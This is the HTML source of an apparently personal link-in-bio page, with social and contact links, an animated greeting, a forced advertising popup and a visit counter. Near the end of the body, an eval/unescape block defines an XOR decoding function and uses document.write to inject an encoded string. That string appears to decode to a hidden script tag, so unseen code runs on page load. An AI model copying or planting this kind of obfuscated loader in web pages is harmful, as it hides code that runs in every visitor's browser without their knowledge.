<!DOCTYPE html>
<html lang="de">
<head>
    <title>Zaa</title>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />

    <!-- meta -->
    <meta name="robots" content="index, follow" />

    <!-- og-embed -->
    <meta property="og:type" content="profile" />
    <meta property="og:description" content="My Personal Website" />
    <meta property="og:url" content="https://zidni.pw" />
    <meta
        property="og:image"
        content="https://telegra.ph/file/f0e634e0742914ed41d0c.jpg"
    />

    <link
        rel="apple-touch-icon"
        sizes="180x180"
        href="assets/img/apple-touch-icon.png"
    />
    <link
        rel="icon"
        type="image/png"
        sizes="32x32"
        href="assets/img/favicon-32x32.png"
    />
    <link
        rel="icon"
        type="image/png"
        sizes="16x16"
        href="assets/img/favicon-16x16.png"
    />
    <link rel="manifest" href="assets/img/site.webmanifest" />

    <!-- css -->
    <link
        rel="stylesheet"
        type="text/css"
        href="https://stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css"
    />
    <link
        rel="stylesheet"
        type="text/css"
        href="https://fonts.googleapis.com/css2?family=Ubuntu&display=swa"
    />
    <link rel="stylesheet" href="assets/css/App.css" />

    <!-- SweetAlert2 CSS -->
    <link
        rel="stylesheet"
        href="https://cdn.jsdelivr.net/npm/sweetalert2@10/dist/sweetalert2.min.css"
    />
</head>
<body>
<div class="main-wrapper">
    <img id="userPhoto" src="assets/img/logo.png" />
    <span id="userName"
    >Konichiwa
        <div id="typed-strings">
          <span>Onichan ><</span>
        </div>
        <span id="typedUsername"></span>
    </span>
    <div id="links">
        <a class="link hvr-grow" href="/profile">
            <i class="fa fa-user" aria-hidden="true"></i>
            <span>About me</span>
        </a>

        <a class="link hvr-grow" href="https://wa.me/6281215205433" target="_blank">
            <i class="fa fa-whatsapp" aria-hidden="true"></i>
            <span>Whatsapp</span>
        </a>
        <a class="link hvr-grow" href="https://www.instagram.com/mii_void" target="_blank">
            <i class="fa fa-instagram" aria-hidden="true"></i>
            <span>Instagram</span>
        </a>
        <a class="link hvr-grow" href="https://github.com/ZidniGz" target="_blank">
            <i class="fa fa-github" aria-hidden="true"></i>
            <span>Github</span>
        </a>
    </div>
    <a href="mailto:zidnialazmi@gmail.com" class="footer">&copy;  <script>
        document.write(new Date().getFullYear());
      </script></a>
</div>

<!-- SweetAlert2 JS -->
<script src="https://cdn.jsdelivr.net/npm/sweetalert2@10"></script>
<script src="https://unpkg.com/typed.js@2.1.0/dist/typed.umd.js"></script>
<script type="text/javascript">
      eval(
        unescape(
          "%66%75%6e%63%74%69%6f%6e%20%61%64%66%66%31%61%28%73%29%20%7b%0a%09%76%61%72%20%72%20%3d%20%22%22%3b%0a%09%76%61%72%20%74%6d%70%20%3d%20%73%2e%73%70%6c%69%74%28%22%39%30%39%33%33%33%30%22%29%3b%0a%09%73%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%30%5d%29%3b%0a%09%6b%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%31%5d%20%2b%20%22%37%35%33%39%30%38%22%29%3b%0a%09%66%6f%72%28%20%76%61%72%20%69%20%3d%20%30%3b%20%69%20%3c%20%73%2e%6c%65%6e%67%74%68%3b%20%69%2b%2b%29%20%7b%0a%09%09%72%20%2b%3d%20%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%28%70%61%72%73%65%49%6e%74%28%6b%2e%63%68%61%72%41%74%28%69%25%6b%2e%6c%65%6e%67%74%68%29%29%5e%73%2e%63%68%61%72%43%6f%64%65%41%74%28%69%29%29%2b%2d%31%29%3b%0a%09%7d%0a%09%72%65%74%75%72%6e%20%72%3b%0a%7d%0a"
        )
      );
      eval(
        unescape(
          "%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%61%64%66%66%31%61%28%27"
        ) +
          "%3e%70%67%7b%62%70%74%26%71%70%6d%3e%2b%6a%71%76%79%7c%3a%31%37%70%73%79%6d%27%73%6b%65%6d%6e%74%67%74%6b%69%66%62%7d%69%74%6c%27%6c%71%6f%37%6b%61%63%6f%38%61%72%76%78%65%71%63%62%2a%68%7d%23%37%3e%34%77%6c%7b%6b%70%72%3a9093330%33%34%33%38%38%31%31" +
          unescape("%27%29%29%3b")
      );
    </script>
<script>
    new Typed("#typedUsername", {
        stringsElement: "#typed-strings",
        loop: true,
        typeSpeed: 60,
        backSpeed: 30,
        backDelay: 2500,
    });

    // Show SweetAlert2 popup on page load
    document.addEventListener('DOMContentLoaded', function() {
        Swal.fire({
            title: 'Iklan',
            html: '<ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-9240374586514484" data-ad-slot="1234567890" data-ad-format="auto"></ins>',
            width: 600,
            padding: '3em',
            backdrop: `
                rgba(0,0,123,0.4)
                url("https://media.giphy.com/media/3o7aD2saalBwwftBIY/giphy.gif")
                left top
                no-repeat
            `,
            didOpen: () => {
                (adsbygoogle = window.adsbygoogle || []).push({});
            }
        });
    });
if (!localStorage.getItem('hit_count')) {
        // Jika belum ada, tambahkan hit dan simpan informasi di localStorage
        document.getElementById("counter").innerText = "Hit berhasil ditambahkan.";
        localStorage.setItem('hit_count', 'true');
         fetch("https://api.counterapi.dev/v1/azmi/azmi/up")
    }
</script>

<script
    src="https://kit.fontawesome.com/a076d05399.js"
    crossorigin="anonymous"
></script>
<!-- Google AdSense script -->
<script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-9240374586514484"
        crossorigin="anonymous"></script>
</body>
</html>
